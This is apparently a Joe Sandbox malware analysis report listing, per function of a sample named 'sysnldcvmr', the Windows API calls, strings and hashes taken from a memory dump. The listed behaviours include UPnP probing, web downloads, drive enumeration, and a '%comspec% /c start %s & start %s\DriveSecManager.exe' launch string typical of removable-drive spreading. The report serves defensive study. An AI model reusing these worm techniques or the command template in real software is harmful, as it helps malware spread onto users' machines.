                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 671207744-0
                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                    APIs
                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleeprecvfrom
                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                    • API String ID: 668330359-3973262388
                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                    APIs
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                    • API String ID: 2743515581-2960703779
                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                    • String ID: .Mw
                                                                    • API String ID: 442028454-2453323595
                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1447977647-3252725368
                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                    APIs
                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                    • NoDrives, xrefs: 00406418
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                    • API String ID: 2666887985-3471754645
                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2251373460-0
                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CountTickrandsrand
                                                                    • String ID:
                                                                    • API String ID: 3488799664-0
                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID:
                                                                    • API String ID: 673498613-0
                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                    APIs
                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                    • htons.WS2_32(?), ref: 00401281
                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                    • String ID: pdu
                                                                    • API String ID: 2164660128-2320407122
                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                    Strings
                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                    • %comspec%, xrefs: 004064BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                    • API String ID: 2038452267-3640840557
                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                    • String ID: .Mw
                                                                    • API String ID: 3102160386-2453323595
                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                    APIs
                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                    • String ID: pdu$.Mw
                                                                    • API String ID: 309973729-3908477397
                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                    APIs
